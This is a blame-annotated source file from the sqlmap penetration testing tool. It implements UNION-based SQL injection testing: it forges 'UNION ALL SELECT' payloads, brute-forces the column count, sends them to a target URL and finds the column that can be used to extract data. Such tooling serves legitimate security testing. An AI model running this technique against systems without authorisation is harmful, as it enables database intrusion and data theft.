2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import randomStr
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2008-12-02 02:09:07 +03:00
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.session import setUnion
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.parse.html import htmlParser
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
def __unionPosition(negative=False, falseCond=False, count=None, comment=None):
|
2010-10-31 19:58:38 +03:00
|
|
|
validPayload = None
|
2010-03-22 18:39:29 +03:00
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
if count is None:
|
|
|
|
count = kb.unionCount
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# For each column of the table (# of NULL) perform a request using
|
|
|
|
# the UNION ALL SELECT statement to test it the target url is
|
|
|
|
# affected by an exploitable inband SQL injection vulnerability
|
2010-11-18 20:55:43 +03:00
|
|
|
for exprPosition in range(0, count):
|
2009-04-22 15:48:07 +04:00
|
|
|
# Prepare expression with delimiters
|
|
|
|
randQuery = randomStr()
|
|
|
|
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
|
|
|
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
|
|
|
|
|
|
|
|
# Forge the inband SQL injection request
|
2010-11-18 20:55:43 +03:00
|
|
|
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)
|
2009-04-22 15:48:07 +04:00
|
|
|
payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
|
|
|
|
|
|
|
|
# Perform the request
|
|
|
|
resultPage, _ = Request.queryPage(payload, content=True)
|
|
|
|
|
2010-11-14 18:39:57 +03:00
|
|
|
if resultPage and randQuery in resultPage:
|
2009-04-22 15:48:07 +04:00
|
|
|
setUnion(position=exprPosition)
|
2010-10-31 19:58:38 +03:00
|
|
|
validPayload = payload
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
break
|
|
|
|
|
2010-10-31 19:58:38 +03:00
|
|
|
return validPayload
|
2010-03-22 18:39:29 +03:00
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
def __unionConfirm(count=None, comment=None):
|
2010-10-31 19:58:38 +03:00
|
|
|
validPayload = None
|
2010-03-22 18:39:29 +03:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
# Confirm the inband SQL injection and get the exact column
|
2010-11-14 01:47:37 +03:00
|
|
|
# position which can be used to extract data
|
2009-04-22 15:48:07 +04:00
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-11-18 20:55:43 +03:00
|
|
|
debugMsg = "testing full inband with %s columns" % count
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
validPayload = __unionPosition(count=count, comment=comment)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# Assure that the above function found the exploitable full inband
|
|
|
|
# SQL injection position
|
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-11-18 20:55:43 +03:00
|
|
|
debugMsg = "testing single-entry inband value with %s columns" % count
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
validPayload = __unionPosition(negative=True, count=count, comment=comment)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# Assure that the above function found the exploitable partial
|
2010-10-26 03:39:55 +04:00
|
|
|
# (single entry) inband SQL injection position with negative
|
2010-10-31 19:58:38 +03:00
|
|
|
# parameter validPayload
|
2009-04-22 15:48:07 +04:00
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-11-18 20:55:43 +03:00
|
|
|
# NOTE: disable false condition for the time being, in the
|
|
|
|
# end it produces the same as prepending the original
|
|
|
|
# parameter value with a minus (negative)
|
|
|
|
#validPayload = __unionPosition(falseCond=True, count=count, comment=comment)
|
|
|
|
#
|
2009-04-22 15:48:07 +04:00
|
|
|
# Assure that the above function found the exploitable partial
|
2010-10-26 03:39:55 +04:00
|
|
|
# (single entry) inband SQL injection position by appending
|
2010-10-31 19:58:38 +03:00
|
|
|
# a false condition after the parameter validPayload
|
2010-11-18 20:55:43 +03:00
|
|
|
#if not isinstance(kb.unionPosition, int):
|
|
|
|
# return None
|
|
|
|
#else:
|
|
|
|
# setUnion(falseCond=True)
|
|
|
|
return None
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-10-26 03:39:55 +04:00
|
|
|
setUnion(negative=True)
|
2008-12-22 00:39:53 +03:00
|
|
|
|
2010-10-31 19:58:38 +03:00
|
|
|
return validPayload
|
2008-12-22 00:39:53 +03:00
|
|
|
|
2010-11-19 17:56:20 +03:00
|
|
|
def __unionTestByCharBruteforce(comment):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
This method tests if the target url is affected by an inband
|
|
|
|
SQL injection vulnerability. The test is done up to 50 columns
|
|
|
|
on the target database table
|
|
|
|
"""
|
|
|
|
|
2010-11-19 17:56:20 +03:00
|
|
|
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-19 18:48:24 +03:00
|
|
|
for count in range(conf.uColsStart, conf.uColsStop+1):
|
2010-11-02 14:59:24 +03:00
|
|
|
if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
|
2008-10-15 19:38:22 +04:00
|
|
|
query = query[:-len(" FROM DUAL")]
|
|
|
|
|
|
|
|
if count:
|
2010-11-19 17:56:20 +03:00
|
|
|
query += ", %s" % conf.uChar
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-02 14:59:24 +03:00
|
|
|
if kb.dbms == DBMS.ORACLE:
|
2008-10-15 19:38:22 +04:00
|
|
|
query += " FROM DUAL"
|
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
validPayload = __unionConfirm(count, comment)
|
2008-12-22 00:39:53 +03:00
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
if validPayload:
|
|
|
|
setUnion(count=count)
|
2008-12-22 00:39:53 +03:00
|
|
|
break
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-18 20:55:43 +03:00
|
|
|
return validPayload
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def unionTest():
|
|
|
|
"""
|
|
|
|
This method tests if the target url is affected by an inband
|
|
|
|
SQL injection vulnerability. The test is done up to 3*50 times
|
|
|
|
"""
|
|
|
|
|
2010-03-27 02:23:25 +03:00
|
|
|
if conf.direct:
|
|
|
|
return
|
|
|
|
|
2010-11-08 19:46:25 +03:00
|
|
|
if kb.unionTest is not None:
|
|
|
|
return kb.unionTest
|
2010-05-19 18:21:59 +04:00
|
|
|
|
2010-12-03 17:57:30 +03:00
|
|
|
oldTechnique = kb.technique
|
|
|
|
kb.technique = 3
|
|
|
|
|
2010-11-29 20:18:38 +03:00
|
|
|
if conf.uChar == "NULL":
|
2008-12-22 00:39:53 +03:00
|
|
|
technique = "NULL bruteforcing"
|
2010-11-19 17:56:20 +03:00
|
|
|
else:
|
|
|
|
technique = "char (%s) bruteforcing" % conf.uChar
|
2008-12-22 00:39:53 +03:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg = "testing inband sql injection on parameter "
|
2010-11-28 21:10:54 +03:00
|
|
|
infoMsg += "'%s' with %s technique" % (kb.injection.parameter, technique)
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-19 18:48:24 +03:00
|
|
|
comment = queries[kb.dbms].comment.query
|
2010-11-29 20:18:38 +03:00
|
|
|
validPayload = __unionTestByCharBruteforce(comment)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-19 18:48:24 +03:00
|
|
|
if validPayload:
|
2010-12-01 13:59:58 +03:00
|
|
|
validPayload = agent.removePayloadDelimiters(validPayload, False)
|
|
|
|
setUnion(char=conf.uChar)
|
2010-11-19 18:48:24 +03:00
|
|
|
setUnion(comment=comment)
|
2010-12-01 13:59:58 +03:00
|
|
|
setUnion(payload=validPayload)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-12-01 13:59:58 +03:00
|
|
|
if kb.unionTest is not None:
|
|
|
|
infoMsg = "the target url is affected by an exploitable "
|
2010-11-18 20:55:43 +03:00
|
|
|
infoMsg += "inband sql injection vulnerability "
|
2010-11-28 21:10:54 +03:00
|
|
|
infoMsg += "on parameter '%s' with %d columns" % (kb.injection.parameter, kb.unionCount)
|
2010-11-18 20:55:43 +03:00
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
2010-12-01 13:59:58 +03:00
|
|
|
infoMsg = "the target url is not affected by an exploitable "
|
2010-11-18 20:55:43 +03:00
|
|
|
infoMsg += "inband sql injection vulnerability "
|
2010-11-28 21:10:54 +03:00
|
|
|
infoMsg += "on parameter '%s'" % kb.injection.parameter
|
2010-11-18 20:55:43 +03:00
|
|
|
logger.info(infoMsg)
|
2010-12-03 17:57:30 +03:00
|
|
|
kb.technique = oldTechnique
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-11-08 19:46:25 +03:00
|
|
|
return kb.unionTest
|